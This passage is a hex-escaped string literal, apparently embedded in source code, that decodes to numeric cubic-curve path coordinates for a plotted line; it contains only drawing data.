\x35\x39\x33\x35\x20\x31\x34\x2e\x39\x32\x33\x34\x35\x35\x31\x34\
\x32\x37\x20\x34\x2e\x30\x31\x35\x30\x37\x37\x36\x32\x38\x31\x39\
\x20\x31\x34\x2e\x39\x34\x34\x33\x38\x35\x35\x31\x34\x31\x20\x34\
\x2e\x30\x32\x31\x33\x31\x38\x36\x39\x37\x30\x32\x20\x31\x34\x2e\
\x39\x36\x34\x35\x39\x33\x30\x35\x31\x20\x43\x20\x34\x2e\x30\x32\
\x37\x35\x35\x39\x37\x36\x35\x38\x36\x20\x31\x34\x2e\x39\x38\x34\
\x38\x30\x30\x35\x38\x37\x39\x20\x34\x2e\x30\x33\x33\x38\x30\x30\
\x38\x33\x34\x36\x39\x20\x31\x35\x2e\x30\x30\x34\x32\x38\x30\x39\
\x34\x30\x33\x20\x34\x2e\x30\x34\x30\x30\x34\x31\x39\x30\x33\x35\
\x33\x20\x31\x35\x2e\x30\x32\x33\x30\x32\x33\x34\x34\x36\x39\x20\
\x43\x20\x34\x2e\x30\x34\x36\x32\x38\x32\x39\x37\x32\x33\x37\x20\
\x31\x35\x2e\x30\x34\x31\x37\x36\x35\x39\x35\x33\x36\x20\x34\x2e\
\x30\x35\x32\x35\x32\x34\x30\x34\x31\x32\x20\x31\x35\x2e\x30\x35\
\x39\x37\x36\x36\x31\x37\x34\x35\x20\x34\x2e\x30\x35\x38\x37\x36\
\x35\x31\x31\x30\x30\x34\x20\x31\x35\x2e\x30\x37\x37\x30\x31\x34\
\x36\x37\x39\x20\x43\x20\x34\x2e\x30\x36\x35\x30\x30\x36\x31\x37\
\x38\x38\x37\x20\x31\x35\x2e\x30\x39\x34\x32\x36\x33\x31\x38\x33\
\x35\x20\x34\x2e\x30\x37\x31\x32\x34\x37\x32\x34\x37\x37\x31\x20\
\x31\x35\x2e\x31\x31\x30\x37\x35\x35\x34\x34\x38\x32\x20\x34\x2e\
\x30\x37\x37\x34\x38\x38\x33\x31\x36\x35\x35\x20\x31\x35\x2e\x31\
\x32\x36\x34\x38\x33\x32\x38\x38\x20\x43\x20\x34\x2e\x30\x38\x33\
\x37\x32\x39\x33\x38\x35\x33\x38\x20\x31\x35\x2e\x31\x34\x32\x32\
\x31\x31\x31\x32\x37\x38\x20\x34\x2e\x30\x38\x39\x39\x37\x30\x34\
\x35\x34\x32\x32\x20\x31\x35\x2e\x31\x35\x37\x31\x36\x39\x39\x34\
\x32\x39\x20\x34\x2e\x30\x39\x36\x32\x31\x31\x35\x32\x33\x30\x35\
\x20\x31\x35\x2e\x31\x37\x31\x33\x35\x32\x38\x30\x36\x31\x20\x43\
\x20\x34\x2e\x31\x30\x32\x34\x35\x32\x35\x39\x31\x38\x39\x20\x31\
\x35\x2e\x31\x38\x35\x35\x33\x35\x36\x36\x39\x33\x20\x34\x2e\x31\
\x30\x38\x36\x39\x33\x36\x36\x30\x37\x33\x20\x31\x35\x2e\x31\x39\
\x38\x39\x33\x37\x39\x31\x31\x35\x20\x34\x2e\x31\x31\x34\x39\x33\
\x34\x37\x32\x39\x35\x36\x20\x31\x35\x2e\x32\x31\x31\x35\x35\x33\
\x38\x37\x34\x33\x20\x43\x20\x34\x2e\x31\x32\x31\x31\x37\x35\x37\
\x39\x38\x34\x20\x31\x35\x2e\x32\x32\x34\x31\x36\x39\x38\x33\x37\
\x31\x20\x34\x2e\x31\x32\x37\x34\x31\x36\x38\x36\x37\x32\x33\x20\
\x31\x35\x2e\x32\x33\x35\x39\x39\x34\x37\x38\x39\x35\x20\x34\x2e\
\x31\x33\x33\x36\x35\x37\x39\x33\x36\x30\x37\x20\x31\x35\x2e\x32\
\x34\x37\x30\x32\x34\x33\x35\x30\x34\x20\x43\x20\x34\x2e\x31\x33\
\x39\x38\x39\x39\x30\x30\x34\x39\x31\x20\x31\x35\x2e\x32\x35\x38\
\x30\x35\x33\x39\x31\x31\x32\x20\x34\x2e\x31\x34\x36\x31\x34\x30\
\x30\x37\x33\x37\x34\x20\x31\x35\x2e\x32\x36\x38\x32\x38\x33\x32\
\x39\x34\x38\x20\x34\x2e\x31\x35\x32\x33\x38\x31\x31\x34\x32\x35\
\x38\x20\x31\x35\x2e\x32\x37\x37\x37\x30\x39\x34\x30\x34\x33\x20\
\x43\x20\x34\x2e\x31\x35\x38\x36\x32\x32\x32\x31\x31\x34\x31\x20\
\x31\x35\x2e\x32\x38\x37\x31\x33\x35\x35\x31\x33\x38\x20\x34\x2e\
\x31\x36\x34\x38\x36\x33\x32\x38\x30\x32\x35\x20\x31\x35\x2e\x32\
\x39\x35\x37\x35\x33\x35\x31\x36\x32\x20\x34\x2e\x31\x37\x31\x31\
\x30\x34\x33\x34\x39\x30\x39\x20\x31\x35\x2e\x33\x30\x33\x35\x36\
\x31\x36\x30\x33\x36\x20\x43\x20\x34\x2e\x31\x37\x37\x33\x34\x35\
\x34\x31\x37\x39\x32\x20\x31\x35\x2e\x33\x31\x31\x33\x36\x39\x36\
\x39\x31\x20\x34\x2e\x31\x38\x33\x35\x38\x36\x34\x38\x36\x37\x36\
\x20\x31\x35\x2e\x33\x31\x38\x33\x36\x32\x39\x39\x30\x36\x20\x34\
\x2e\x31\x38\x39\x38\x32\x37\x35\x35\x35\x35\x39\x20\x31\x35\x2e\
\x33\x32\x34\x35\x34\x30\x39\x38\x36\x32\x20\x43\x20\x34\x2e\x31\
\x39\x36\x30\x36\x38\x36\x32\x34\x34\x33\x20\x31\x35\x2e\x33\x33\
\x30\x37\x31\x38\x39\x38\x31\x38\x20\x34\x2e\x32\x30\x32\x33\x30\
\x39\x36\x39\x33\x32\x37\x20\x31\x35\x2e\x33\x33\x36\x30\x37\x36\
\x37\x36\x38\x33\x20\x34\x2e\x32\x30\x38\x35\x35\x30\x37\x36\x32\
\x31\x20\x31\x35\x2e\x33\x34\x30\x36\x31\x35\x31\x32\x32\x33\x20\
\x43\x20\x34\x2e\x32\x31\x34\x37\x39\x31\x38\x33\x30\x39\x34\x20\
\x31\x35\x2e\x33\x34\x35\x31\x35\x33\x34\x37\x36\x32\x20\x34\x2e\
\x32\x32\x31\x30\x33\x32\x38\x39\x39\x37\x37\x20\x31\x35\x2e\x33\
\x34\x38\x38\x36\x37\x34\x36\x37\x38\x20\x34\x2e\x32\x32\x37\x32\
\x37\x33\x39\x36\x38\x36\x31\x20\x31\x35\x2e\x33\x35\x31\x37\x35\
\x39\x31\x36\x34\x37\x20\x43\x20\x34\x2e\x32\x33\x33\x35\x31\x35\
\x30\x33\x37\x34\x35\x20\x31\x35\x2e\x33\x35\x34\x36\x35\x30\x38\
\x36\x31\x37\x20\x34\x2e\x32\x33\x39\x37\x35\x36\x31\x30\x36\x32\
\x38\x20\x31\x35\x2e\x33\x35\x36\x37\x31\x35\x33\x31\x37\x32\x20\
\x34\x2e\x32\x34\x35\x39\x39\x37\x31\x37\x35\x31\x32\x20\x31\x35\
\x2e\x33\x35\x37\x39\x35\x35\x38\x38\x37\x32\x20\x43\x20\x34\x2e\
\x32\x35\x32\x32\x33\x38\x32\x34\x33\x39\x35\x20\x31\x35\x2e\x33\
\x35\x39\x31\x39\x36\x34\x35\x37\x32\x20\x34\x2e\x32\x35\x38\x34\
\x37\x39\x33\x31\x32\x37\x39\x20\x31\x35\x2e\x33\x35\x39\x36\x30\
\x38\x31\x38\x35\x34\x20\x34\x2e\x32\x36\x34\x37\x32\x30\x33\x38\
\x31\x36\x33\x20\x31\x35\x2e\x33\x35\x39\x31\x39\x35\x37\x31\x30\
\x38\x20\x43\x20\x34\x2e\x32\x37\x30\x39\x36\x31\x34\x35\x30\x34\
\x36\x20\x31\x35\x2e\x33\x35\x38\x37\x38\x33\x32\x33\x36\x32\x20\
\x34\x2e\x32\x37\x37\x32\x30\x32\x35\x31\x39\x33\x20\x31\x35\x2e\
\x33\x35\x37\x35\x34\x31\x36\x30\x30\x37\x20\x34\x2e\x32\x38\x33\
\x34\x34\x33\x35\x38\x38\x31\x34\x20\x31\x35\x2e\x33\x35\x35\x34\
\x37\x36\x37\x31\x39\x31\x20\x43\x20\x34\x2e\x32\x38\x39\x36\x38\
\x34\x36\x35\x36\x39\x37\x20\x31\x35\x2e\x33\x35\x33\x34\x31\x31\
\x38\x33\x37\x35\x20\x34\x2e\x32\x39\x35\x39\x32\x35\x37\x32\x35\
\x38\x31\x20\x31\x35\x2e\x33\x35\x30\x35\x31\x38\x37\x35\x37\x36\
\x20\x34\x2e\x33\x30\x32\x31\x36\x36\x37\x39\x34\x36\x34\x20\x31\
\x35\x2e\x33\x34\x36\x38\x30\x34\x36\x36\x30\x39\x20\x43\x20\x34\
\x2e\x33\x30\x38\x34\x30\x37\x38\x36\x33\x34\x38\x20\x31\x35\x2e\
\x33\x34\x33\x30\x39\x30\x35\x36\x34\x31\x20\x34\x2e\x33\x31\x34\
\x36\x34\x38\x39\x33\x32\x33\x32\x20\x31\x35\x2e\x33\x33\x38\x35\
\x35\x30\x35\x31\x31\x39\x20\x34\x2e\x33\x32\x30\x38\x39\x30\x30\
\x30\x31\x31\x35\x20\x31\x35\x2e\x33\x33\x33\x31\x39\x32\x39\x34\
\x31\x32\x20\x43\x20\x34\x2e\x33\x32\x37\x31\x33\x31\x30\x36\x39\
\x39\x39\x20\x31\x35\x2e\x33\x32\x37\x38\x33\x35\x33\x37\x30\x36\
\x20\x34\x2e\x33\x33\x33\x33\x37\x32\x31\x33\x38\x38\x32\x20\x31\
\x35\x2e\x33\x32\x31\x36\x35\x35\x33\x36\x33\x39\x20\x34\x2e\x33\
\x33\x39\x36\x31\x33\x32\x30\x37\x36\x36\x20\x31\x35\x2e\x33\x31\
\x34\x36\x36\x32\x36\x30\x31\x20\x43\x20\x34\x2e\x33\x34\x35\x38\
\x35\x34\x32\x37\x36\x35\x20\x31\x35\x2e\x33\x30\x37\x36\x36\x39\
\x38\x33\x38\x31\x20\x34\x2e\x33\x35\x32\x30\x39\x35\x33\x34\x35\
\x33\x33\x20\x31\x35\x2e\x32\x39\x39\x38\x35\x39\x34\x33\x30\x31\
\x20\x34\x2e\x33\x35\x38\x33\x33\x36\x34\x31\x34\x31\x37\x20\x31\
\x35\x2e\x32\x39\x31\x32\x34\x32\x32\x38\x34\x33\x20\x43\x20\x34\
\x2e\x33\x36\x34\x35\x37\x37\x34\x38\x33\x20\x31\x35\x2e\x32\x38\
\x32\x36\x32\x35\x31\x33\x38\x35\x20\x34\x2e\x33\x37\x30\x38\x31\
\x38\x35\x35\x31\x38\x34\x20\x31\x35\x2e\x32\x37\x33\x31\x39\x36\
\x34\x30\x32\x34\x20\x34\x2e\x33\x37\x37\x30\x35\x39\x36\x32\x30\
\x36\x38\x20\x31\x35\x2e\x32\x36\x32\x39\x36\x38\x31\x39\x33\x39\
\x20\x43\x20\x34\x2e\x33\x38\x33\x33\x30\x30\x36\x38\x39\x35\x31\
\x20\x31\x35\x2e\x32\x35\x32\x37\x33\x39\x39\x38\x35\x35\x20\x34\
\x2e\x33\x38\x39\x35\x34\x31\x37\x35\x38\x33\x35\x20\x31\x35\x2e\
\x32\x34\x31\x37\x30\x37\x34\x39\x36\x31\x20\x34\x2e\x33\x39\x35\
\x37\x38\x32\x38\x32\x37\x31\x38\x20\x31\x35\x2e\x32\x32\x39\x38\
\x38\x34\x30\x33\x35\x37\x20\x43\x20\x34\x2e\x34\x30\x32\x30\x32\
\x33\x38\x39\x36\x30\x32\x20\x31\x35\x2e\x32\x31\x38\x30\x36\x30\
\x35\x37\x35\x33\x20\x34\x2e\x34\x30\x38\x32\x36\x34\x39\x36\x34\
\x38\x36\x20\x31\x35\x2e\x32\x30\x35\x34\x34\x31\x33\x38\x36\x35\
\x20\x34\x2e\x34\x31\x34\x35\x30\x36\x30\x33\x33\x36\x39\x20\x31\
\x35\x2e\x31\x39\x32\x30\x34\x30\x39\x35\x30\x37\x20\x43\x20\x34\
\x2e\x34\x32\x30\x37\x34\x37\x31\x30\x32\x35\x33\x20\x31\x35\x2e\
\x31\x37\x38\x36\x34\x30\x35\x31\x34\x38\x20\x34\x2e\x34\x32\x36\
\x39\x38\x38\x31\x37\x31\x33\x36\x20\x31\x35\x2e\x31\x36\x34\x34\
\x35\x34\x31\x33\x33\x33\x20\x34\x2e\x34\x33\x33\x32\x32\x39\x32\
\x34\x30\x32\x20\x31\x35\x2e\x31\x34\x39\x34\x39\x37\x34\x33\x36\
\x33\x20\x43\x20\x34\x2e\x34\x33\x39\x34\x37\x30\x33\x30\x39\x30\
\x34\x20\x31\x35\x2e\x31\x33\x34\x35\x34\x30\x37\x33\x39\x34\x20\
\x34\x2e\x34\x34\x35\x37\x31\x31\x33\x37\x37\x38\x37\x20\x31\x35\
\x2e\x31\x31\x38\x38\x30\x39\x30\x39\x34\x31\x20\x34\x2e\x34\x35\
\x31\x39\x35\x32\x34\x34\x36\x37\x31\x20\x31\x35\x2e\x31\x30\x32\
\x33\x31\x39\x32\x35\x35\x39\x20\x43\x20\x34\x2e\x34\x35\x38\x31\
\x39\x33\x35\x31\x35\x35\x34\x20\x31\x35\x2e\x30\x38\x35\x38\x32\
\x39\x34\x31\x37\x37\x20\x34\x2e\x34\x36\x34\x34\x33\x34\x35\x38\
\x34\x33\x38\x20\x31\x35\x2e\x30\x36\x38\x35\x37\x36\x38\x32\x36\
\x37\x20\x34\x2e\x34\x37\x30\x36\x37\x35\x36\x35\x33\x32\x32\x20\
\x31\x35\x2e\x30\x35\x30\x35\x37\x39\x33\x33\x37\x20\x43\x20\x34\
\x2e\x34\x37\x36\x39\x31\x36\x37\x32\x32\x30\x35\x20\x31\x35\x2e\
\x30\x33\x32\x35\x38\x31\x38\x34\x37\x34\x20\x34\x2e\x34\x38\x33\
\x31\x35\x37\x37\x39\x30\x38\x39\x20\x31\x35\x2e\x30\x31\x33\x38\
\x33\x34\x39\x37\x39\x34\x20\x34\x2e\x34\x38\x39\x33\x39\x38\x38\
\x35\x39\x37\x32\x20\x31\x34\x2e\x39\x39\x34\x33\x35\x37\x36\x35\
\x38\x36\x20\x43\x20\x34\x2e\x34\x39\x35\x36\x33\x39\x39\x32\x38\
\x35\x36\x20\x31\x34\x2e\x39\x37\x34\x38\x38\x30\x33\x33\x37\x39\
\x20\x34\x2e\x35\x30\x31\x38\x38\x30\x39\x39\x37\x34\x20\x31\x34\
\x2e\x39\x35\x34\x36\x36\x38\x31\x37\x31\x36\x20\x34\x2e\x35\x30\
\x38\x31\x32\x32\x30\x36\x36\x32\x33\x20\x31\x34\x2e\x39\x33\x33\
\x37\x34\x31\x31\x32\x37\x36\x20\x43\x20\x34\x2e\x35\x31\x34\x33\
\x36\x33\x31\x33\x35\x30\x37\x20\x31\x34\x2e\x39\x31\x32\x38\x31\
\x34\x30\x38\x33\x35\x20\x34\x2e\x35\x32\x30\x36\x30\x34\x32\x30\
\x33\x39\x20\x31\x34\x2e\x38\x39\x31\x31\x36\x37\x38\x36\x32\x38\
\x20\x34\x2e\x35\x32\x36\x38\x34\x35\x32\x37\x32\x37\x34\x20\x31\
\x34\x2e\x38\x36\x38\x38\x32\x33\x34\x34\x34\x32\x20\x43\x20\x34\
\x2e\x35\x33\x33\x30\x38\x36\x33\x34\x31\x35\x38\x20\x31\x34\x2e\
\x38\x34\x36\x34\x37\x39\x30\x32\x35\x37\x20\x34\x2e\x35\x33\x39\
\x33\x32\x37\x34\x31\x30\x34\x31\x20\x31\x34\x2e\x38\x32\x33\x34\
\x33\x32\x32\x31\x30\x39\x20\x34\x2e\x35\x34\x35\x35\x36\x38\x34\
\x37\x39\x32\x35\x20\x31\x34\x2e\x37\x39\x39\x37\x30\x34\x39\x35\
\x37\x37\x20\x43\x20\x34\x2e\x35\x35\x31\x38\x30\x39\x35\x34\x38\
\x30\x39\x20\x31\x34\x2e\x37\x37\x35\x39\x37\x37\x37\x30\x34\x34\
\x20\x34\x2e\x35\x35\x38\x30\x35\x30\x36\x31\x36\x39\x32\x20\x31\
\x34\x2e\x37\x35\x31\x35\x36\x35\x39\x32\x31\x31\x20\x34\x2e\x35\
\x36\x34\x32\x39\x31\x36\x38\x35\x37\x36\x20\x31\x34\x2e\x37\x32\
\x36\x34\x39\x32\x35\x31\x30\x34\x20\x43\x20\x34\x2e\x35\x37\x30\
\x35\x33\x32\x37\x35\x34\x35\x39\x20\x31\x34\x2e\x37\x30\x31\x34\
\x31\x39\x30\x39\x39\x38\x20\x34\x2e\x35\x37\x36\x37\x37\x33\x38\
\x32\x33\x34\x33\x20\x31\x34\x2e\x36\x37\x35\x36\x38\x30\x30\x38\
\x33\x35\x20\x34\x2e\x35\x38\x33\x30\x31\x34\x38\x39\x32\x32\x37\
\x20\x31\x34\x2e\x36\x34\x39\x32\x39\x39\x32\x37\x33\x36\x20\x43\
\x20\x34\x2e\x35\x38\x39\x32\x35\x35\x39\x36\x31\x31\x20\x31\x34\
\x2e\x36\x32\x32\x39\x31\x38\x34\x36\x33\x38\x20\x34\x2e\x35\x39\
\x35\x34\x39\x37\x30\x32\x39\x39\x34\x20\x31\x34\x2e\x35\x39\x35\
\x38\x39\x32\x30\x30\x31\x35\x20\x34\x2e\x36\x30\x31\x37\x33\x38\
\x30\x39\x38\x37\x37\x20\x31\x34\x2e\x35\x36\x38\x32\x34\x34\x35\
\x37\x31\x36\x20\x43\x20\x34\x2e\x36\x30\x37\x39\x37\x39\x31\x36\
\x37\x36\x31\x20\x31\x34\x2e\x35\x34\x30\x35\x39\x37\x31\x34\x31\
\x37\x20\x34\x2e\x36\x31\x34\x32\x32\x30\x32\x33\x36\x34\x35\x20\
\x31\x34\x2e\x35\x31\x32\x33\x32\x35\x30\x31\x30\x37\x20\x34\x2e\
\x36\x32\x30\x34\x36\x31\x33\x30\x35\x32\x38\x20\x31\x34\x2e\x34\
\x38\x33\x34\x35\x33\x36\x39\x37\x39\x20\x43\x20\x34\x2e\x36\x32\
\x36\x37\x30\x32\x33\x37\x34\x31\x32\x20\x31\x34\x2e\x34\x35\x34\
\x35\x38\x32\x33\x38\x35\x31\x20\x34\x2e\x36\x33\x32\x39\x34\x33\
\x34\x34\x32\x39\x35\x20\x31\x34\x2e\x34\x32\x35\x31\x30\x38\x32\
\x38\x38\x31\x20\x34\x2e\x36\x33\x39\x31\x38\x34\x35\x31\x31\x37\
\x39\x20\x31\x34\x2e\x33\x39\x35\x30\x35\x37\x37\x32\x31\x33\x20\
\x43\x20\x34\x2e\x36\x34\x35\x34\x32\x35\x35\x38\x30\x36\x33\x20\
\x31\x34\x2e\x33\x36\x35\x30\x30\x37\x31\x35\x34\x35\x20\x34\x2e\
\x36\x35\x31\x36\x36\x36\x36\x34\x39\x34\x36\x20\x31\x34\x2e\x33\
\x33\x34\x33\x37\x36\x36\x35\x32\x32\x20\x34\x2e\x36\x35\x37\x39\
\x30\x37\x37\x31\x38\x33\x20\x31\x34\x2e\x33\x30\x33\x31\x39\x33\
\x32\x38\x33\x33\x20\x43\x20\x34\x2e\x36\x36\x34\x31\x34\x38\x37\
\x38\x37\x31\x33\x20\x31\x34\x2e\x32\x37\x32\x30\x30\x39\x39\x31\
\x34\x34\x20\x34\x2e\x36\x37\x30\x33\x38\x39\x38\x35\x35\x39\x37\
\x20\x31\x34\x2e\x32\x34\x30\x32\x37\x30\x33\x35\x35\x32\x20\x34\
\x2e\x36\x37\x36\x36\x33\x30\x39\x32\x34\x38\x31\x20\x31\x34\x2e\
\x32\x30\x38\x30\x30\x32\x33\x38\x37\x20\x43\x20\x34\x2e\x36\x38\
\x32\x38\x37\x31\x39\x39\x33\x36\x34\x20\x31\x34\x2e\x31\x37\x35\
\x37\x33\x34\x34\x31\x38\x39\x20\x34\x2e\x36\x38\x39\x31\x31\x33\
\x30\x36\x32\x34\x38\x20\x31\x34\x2e\x31\x34\x32\x39\x33\x34\x38\
\x36\x35\x34\x20\x34\x2e\x36\x39\x35\x33\x35\x34\x31\x33\x31\x33\
\x31\x20\x31\x34\x2e\x31\x30\x39\x36\x33\x32\x31\x37\x37\x35\x20\
\x43\x20\x34\x2e\x37\x30\x31\x35\x39\x35\x32\x30\x30\x31\x35\x20\
\x31\x34\x2e\x30\x37\x36\x33\x32\x39\x34\x38\x39\x36\x20\x34\x2e\
\x37\x30\x37\x38\x33\x36\x32\x36\x38\x39\x39\x20\x31\x34\x2e\x30\
\x34\x32\x35\x32\x30\x36\x34\x33\x20\x34\x2e\x37\x31\x34\x30\x37\
\x37\x33\x33\x37\x38\x32\x20\x31\x34\x2e\x30\x30\x38\x32\x33\x34\
\x37\x31\x34\x33\x20\x43\x20\x34\x2e\x37\x32\x30\x33\x31\x38\x34\
\x30\x36\x36\x36\x20\x31\x33\x2e\x39\x37\x33\x39\x34\x38\x37\x38\
\x35\x36\x20\x34\x2e\x37\x32\x36\x35\x35\x39\x34\x37\x35\x34\x39\
\x20\x31\x33\x2e\x39\x33\x39\x31\x38\x32\x39\x30\x37\x33\x20\x34\
\x2e\x37\x33\x32\x38\x30\x30\x35\x34\x34\x33\x33\x20\x31\x33\x2e\
\x39\x30\x33\x39\x36\x36\x37\x33\x36\x35\x20\x43\x20\x34\x2e\x37\
\x33\x39\x30\x34\x31\x36\x31\x33\x31\x37\x20\x31\x33\x2e\x38\x36\
\x38\x37\x35\x30\x35\x36\x35\x38\x20\x34\x2e\x37\x34\x35\x32\x38\
\x32\x36\x38\x32\x20\x31\x33\x2e\x38\x33\x33\x30\x38\x31\x33\x39\
\x36\x34\x20\x34\x2e\x37\x35\x31\x35\x32\x33\x37\x35\x30\x38\x34\
\x20\x31\x33\x2e\x37\x39\x36\x39\x38\x39\x34\x32\x30\x35\x20\x43\
\x20\x34\x2e\x37\x35\x37\x37\x36\x34\x38\x31\x39\x36\x37\x20\x31\
\x33\x2e\x37\x36\x30\x38\x39\x37\x34\x34\x34\x35\x20\x34\x2e\x37\
\x36\x34\x30\x30\x35\x38\x38\x38\x35\x31\x20\x31\x33\x2e\x37\x32\
\x34\x33\x38\x30\x31\x32\x31\x31\x20\x34\x2e\x37\x37\x30\x32\x34\
\x36\x39\x35\x37\x33\x35\x20\x31\x33\x2e\x36\x38\x37\x34\x36\x38\
\x31\x33\x30\x35\x20\x43\x20\x34\x2e\x37\x37\x36\x34\x38\x38\x30\
\x32\x36\x31\x38\x20\x31\x33\x2e\x36\x35\x30\x35\x35\x36\x31\x33\
\x39\x39\x20\x34\x2e\x37\x38\x32\x37\x32\x39\x30\x39\x35\x30\x32\
\x20\x31\x33\x2e\x36\x31\x33\x32\x34\x37\x31\x31\x30\x36\x20\x34\
\x2e\x37\x38\x38\x39\x37\x30\x31\x36\x33\x38\x35\x20\x31\x33\x2e\
\x35\x37\x35\x35\x37\x32\x31\x36\x33\x35\x20\x43\x20\x34\x2e\x37\
\x39\x35\x32\x31\x31\x32\x33\x32\x36\x39\x20\x31\x33\x2e\x35\x33\
\x37\x38\x39\x37\x32\x31\x36\x33\x20\x34\x2e\x38\x30\x31\x34\x35\
\x32\x33\x30\x31\x35\x33\x20\x31\x33\x2e\x34\x39\x39\x38\x35\x34\
\x31\x35\x33\x20\x34\x2e\x38\x30\x37\x36\x39\x33\x33\x37\x30\x33\
\x36\x20\x31\x33\x2e\x34\x36\x31\x34\x37\x34\x34\x38\x36\x39\x20\
\x43\x20\x34\x2e\x38\x31\x33\x39\x33\x34\x34\x33\x39\x32\x20\x31\
\x33\x2e\x34\x32\x33\x30\x39\x34\x38\x32\x30\x38\x20\x34\x2e\x38\
\x32\x30\x31\x37\x35\x35\x30\x38\x30\x34\x20\x31\x33\x2e\x33\x38\
\x34\x33\x37\x36\x35\x32\x39\x39\x20\x34\x2e\x38\x32\x36\x34\x31\
\x36\x35\x37\x36\x38\x37\x20\x31\x33\x2e\x33\x34\x35\x33\x35\x31\
\x34\x37\x31\x37\x20\x43\x20\x34\x2e\x38\x33\x32\x36\x35\x37\x36\
\x34\x35\x37\x31\x20\x31\x33\x2e\x33\x30\x36\x33\x32\x36\x34\x31\
\x33\x35\x20\x34\x2e\x38\x33\x38\x38\x39\x38\x37\x31\x34\x35\x34\
\x20\x31\x33\x2e\x32\x36\x36\x39\x39\x32\x37\x34\x35\x34\x20\x34\
\x2e\x38\x34\x35\x31\x33\x39\x37\x38\x33\x33\x38\x20\x31\x33\x2e\
\x32\x32\x37\x33\x38\x32\x36\x31\x39\x36\x20\x43\x20\x34\x2e\x38\
\x35\x31\x33\x38\x30\x38\x35\x32\x32\x32\x20\x31\x33\x2e\x31\x38\
\x37\x37\x37\x32\x34\x39\x33\x38\x20\x34\x2e\x38\x35\x37\x36\x32\
\x31\x39\x32\x31\x30\x35\x20\x31\x33\x2e\x31\x34\x37\x38\x38\x34\
\x32\x35\x30\x31\x20\x34\x2e\x38\x36\x33\x38\x36\x32\x39\x38\x39\
\x38\x39\x20\x31\x33\x2e\x31\x30\x37\x37\x35\x30\x32\x38\x35\x36\
\x20\x43\x20\x34\x2e\x38\x37\x30\x31\x30\x34\x30\x35\x38\x37\x32\
\x20\x31\x33\x2e\x30\x36\x37\x36\x31\x36\x33\x32\x31\x31\x20\x34\
\x2e\x38\x37\x36\x33\x34\x35\x31\x32\x37\x35\x36\x20\x31\x33\x2e\
\x30\x32\x37\x32\x33\x35\x31\x36\x30\x36\x20\x34\x2e\x38\x38\x32\
\x35\x38\x36\x31\x39\x36\x34\x20\x31\x32\x2e\x39\x38\x36\x36\x33\
\x39\x33\x39\x36\x31\x20\x43\x20\x34\x2e\x38\x38\x38\x38\x32\x37\
\x32\x36\x35\x32\x33\x20\x31\x32\x2e\x39\x34\x36\x30\x34\x33\x36\
\x33\x31\x35\x20\x34\x2e\x38\x39\x35\x30\x36\x38\x33\x33\x34\x30\
\x37\x20\x31\x32\x2e\x39\x30\x35\x32\x33\x31\x39\x37\x34\x39\x20\
\x34\x2e\x39\x30\x31\x33\x30\x39\x34\x30\x32\x39\x20\x31\x32\x2e\
\x38\x36\x34\x32\x33\x37\x31\x36\x32\x38\x20\x43\x20\x34\x2e\x39\
\x30\x37\x35\x35\x30\x34\x37\x31\x37\x34\x20\x31\x32\x2e\x38\x32\
\x33\x32\x34\x32\x33\x35\x30\x37\x20\x34\x2e\x39\x31\x33\x37\x39\
\x31\x35\x34\x30\x35\x38\x20\x31\x32\x2e\x37\x38\x32\x30\x36\x33\
\x32\x38\x34\x32\x20\x34\x2e\x39\x32\x30\x30\x33\x32\x36\x30\x39\
\x34\x31\x20\x31\x32\x2e\x37\x34\x30\x37\x33\x32\x37\x39\x33\x39\
\x20\x43\x20\x34\x2e\x39\x32\x36\x32\x37\x33\x36\x37\x38\x32\x35\
\x20\x31\x32\x2e\x36\x39\x39\x34\x30\x32\x33\x30\x33\x35\x20\x34\
\x2e\x39\x33\x32\x35\x31\x34\x37\x34\x37\x30\x38\x20\x31\x32\x2e\
\x36\x35\x37\x39\x31\x39\x34\x38\x31\x34\x20\x34\x2e\x39\x33\x38\
\x37\x35\x35\x38\x31\x35\x39\x32\x20\x31\x32\x2e\x36\x31\x36\x33\
\x31\x37\x32\x30\x31\x20\x43\x20\x34\x2e\x39\x34\x34\x39\x39\x36\
\x38\x38\x34\x37\x36\x20\x31\x32\x2e\x35\x37\x34\x37\x31\x34\x39\
\x32\x30\x36\x20\x34\x2e\x39\x35\x31\x32\x33\x37\x39\x35\x33\x35\
\x39\x20\x31\x32\x2e\x35\x33\x32\x39\x39\x32\x34\x36\x36\x35\x20\
\x34\x2e\x39\x35\x37\x34\x37\x39\x30\x32\x32\x34\x33\x20\x31\x32\
\x2e\x34\x39\x31\x31\x38\x32\x37\x30\x34\x34\x20\x43\x20\x34\x2e\
\x39\x36\x33\x37\x32\x30\x30\x39\x31\x32\x36\x20\x31\x32\x2e\x34\
\x34\x39\x33\x37\x32\x39\x34\x32\x34\x20\x34\x2e\x39\x36\x39\x39\
\x36\x31\x31\x36\x30\x31\x20\x31\x32\x2e\x34\x30\x37\x34\x37\x35\
\x33\x35\x30\x33\x20\x34\x2e\x39\x37\x36\x32\x30\x32\x32\x32\x38\
\x39\x34\x20\x31\x32\x2e\x33\x36\x35\x35\x32\x32\x37\x33\x35\x37\
\x20\x43\x20\x34\x2e\x39\x38\x32\x34\x34\x33\x32\x39\x37\x37\x37\
\x20\x31\x32\x2e\x33\x32\x33\x35\x37\x30\x31\x32\x31\x31\x20\x34\
\x2e\x39\x38\x38\x36\x38\x34\x33\x36\x36\x36\x31\x20\x31\x32\x2e\
\x32\x38\x31\x35\x36\x32\x31\x35\x36\x20\x34\x2e\x39\x39\x34\x39\
\x32\x35\x34\x33\x35\x34\x34\x20\x31\x32\x2e\x32\x33\x39\x35\x33\
\x31\x35\x33\x38\x37\x20\x43\x20\x35\x2e\x30\x30\x31\x31\x36\x36\
\x35\x30\x34\x32\x38\x20\x31\x32\x2e\x31\x39\x37\x35\x30\x30\x39\
\x32\x31\x34\x20\x35\x2e\x30\x30\x37\x34\x30\x37\x35\x37\x33\x31\
\x32\x20\x31\x32\x2e\x31\x35\x35\x34\x34\x37\x35\x31\x38\x36\x20\
\x35\x2e\x30\x31\x33\x36\x34\x38\x36\x34\x31\x39\x35\x20\x31\x32\
\x2e\x31\x31\x33\x34\x30\x33\x38\x36\x39\x31\x20\x43\x20\x35\x2e\
\x30\x31\x39\x38\x38\x39\x37\x31\x30\x37\x39\x20\x31\x32\x2e\x30\
\x37\x31\x33\x36\x30\x32\x31\x39\x36\x20\x35\x2e\x30\x32\x36\x31\
\x33\x30\x37\x37\x39\x36\x32\x20\x31\x32\x2e\x30\x32\x39\x33\x32\
\x36\x33\x38\x34\x39\x20\x35\x2e\x30\x33\x32\x33\x37\x31\x38\x34\
\x38\x34\x36\x20\x31\x31\x2e\x39\x38\x37\x33\x33\x34\x36\x39\x33\
